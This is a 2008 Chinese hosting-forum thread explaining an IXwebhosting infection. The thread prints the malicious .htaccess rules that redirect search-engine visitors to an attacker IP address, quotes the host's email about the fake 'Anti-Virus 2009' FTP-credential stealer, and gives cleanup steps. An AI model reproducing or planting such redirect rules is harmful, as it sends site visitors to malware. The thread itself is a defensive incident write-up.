HostGator无限空间、无限流量主机

海外主机侦探论坛

 找回密码
 注册

扫一扫,访问微社区

搜索
美国主机优惠信息汇总出售cPanel CloudLinux R1SoftGodaddy美国空间代购
国外主机资料导航支持支付宝付款的美国主机HostEase速度快中文客服!
查看: 4235|回复: 7

[其他] 关于IXwebhosting上出现的安全问题

[复制链接]
发表于 2008-12-10 10:58:50 | 显示全部楼层 |阅读模式
RAKSmart美国主机商2014新春优惠大促销
症状:
直接进入网站没有问题,从google等国外著名搜索引擎进入网站就会转向到一个病毒网站。
具体例子请看: http://bbs.idcspy.org/thread-36706-1-1.html

原因: 网站的.htaccess文件被修改,会加入如下代码:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]

上面的代码就是判断访问者来源,如果是来自上面那些搜索引擎,就自动转向

解决方法:
修正.htaccess,并且去掉.htaccess的写入权限。同时修正根目录的权限,去掉写入权限。

来自IXwebhosting官方的信息,此安全隐患已经得到修正,他们也杀掉了服务器上大部分此类病毒,如果还有问题,请联系ixwebhosting检查。被感染的原因可能是由于你的ftp密码被盗,进而被修改网站文件。

下面是ixwebhosting关于此问题发给用户的信件:

In our ongoing commitment to the security of our customers, we have discovered a vulnerability located within many of our client's websites, including yours. This is a self replicating virus which is found by visiting well-known search engines. When you click on any link it may redirect you to a fake Anti-Virus 2009 website which appears to scan your system and then asks you to download the software. Once downloaded and installed it begins displaying pop ups on your desktop. At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named ".htaccess" to your website. Any visitors to your website will then be redirected to the fake anti-virus website.

We have dedicated our systems administration team to finding a solution to this and are happy to say that as one of the first hosting companies we have successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected.

While your website is now secure, your computer may still be at risk. Here are two easy steps that will detect and remove this malicious software from your computer and make sure your website will not spread the virus again:

1. Uninstall the fake Anti-Virus software by following the instructions at this link:
http://www.bleepingcomputer.com/ ... tall-antivirus-2009

2. Once removed, change your FTP password from within your web hosting control panel. Once logged in, click on the FTP Manager icon and then on the icon next to the password to change it.

To illustrate the severity of the issue I would like to share some facts with you:

   * 26,991 of our customers have been infected with fake Anti-Virus 2009
   * 79,469 websites have been spreading the Anti-Virus 2009 infection
   * 120,923 malicious files have been removed from our system

We are constantly monitoring our servers for potential threats to your website, and are proud to say that we are among the first web hosts to identify this particular problem, and have been the first to offer a resolution. Your continued and safe presence on the internet is our top priority.

If you have questions regarding any of this information, please contact our support team anytime.

Kind Regards,

Fatima Said, CCO
IX Web Hosting
发表于 2008-12-11 13:36:52 | 显示全部楼层
美国服务器
规则收藏
发表于 2008-12-11 14:10:01 | 显示全部楼层
美国服务器
原来是中毒了啊。
发表于 2008-12-11 23:06:11 | 显示全部楼层
RAKSmart美国主机商2014新春优惠大促销
大漠有ix的主机吗?
你说他们换了机房,现在他们的虚拟主机还稳定不?????????
 楼主| 发表于 2008-12-12 09:01:10 | 显示全部楼层
美国服务器
原帖由 ffnn 于 2008-12-11 11:06 PM 发表
大漠有ix的主机吗?
你说他们换了机房,现在他们的虚拟主机还稳定不?????????

这几个月还不错,没出什么问题
换机房之后就好多了
我的是linux的,windows的情况不太清楚
 楼主| 发表于 2008-12-12 09:01:31 | 显示全部楼层
Godaddy美国主机2014年半价优惠大促销
原帖由 add.c 于 2008-12-11 01:36 PM 发表
规则收藏

你要做什么
发表于 2008-12-12 11:46:04 | 显示全部楼层
HostEase美国主机商优惠码
意思是说收藏了,好东西他都要收藏
发表于 2010-1-7 15:22:52 | 显示全部楼层
美国服务器
好帖子,学习了,谢谢
您需要登录后才可以回帖 登录 | 注册

本版积分规则

关闭

站长推荐上一条 /4 下一条

论坛言论由会员发布,不代表本论坛观点;非交易论坛,本站不对会员间交易承担任何责任。

代购请联系本站客服



QQ|手机版|小黑屋|Archiver|海外主机侦探  

GMT+8, 2017-11-24 03:24 PM , Processed in 0.240497 second(s), 31 queries .

Copyright©2008-2017 | 关于我们

快速回复 返回顶部 返回列表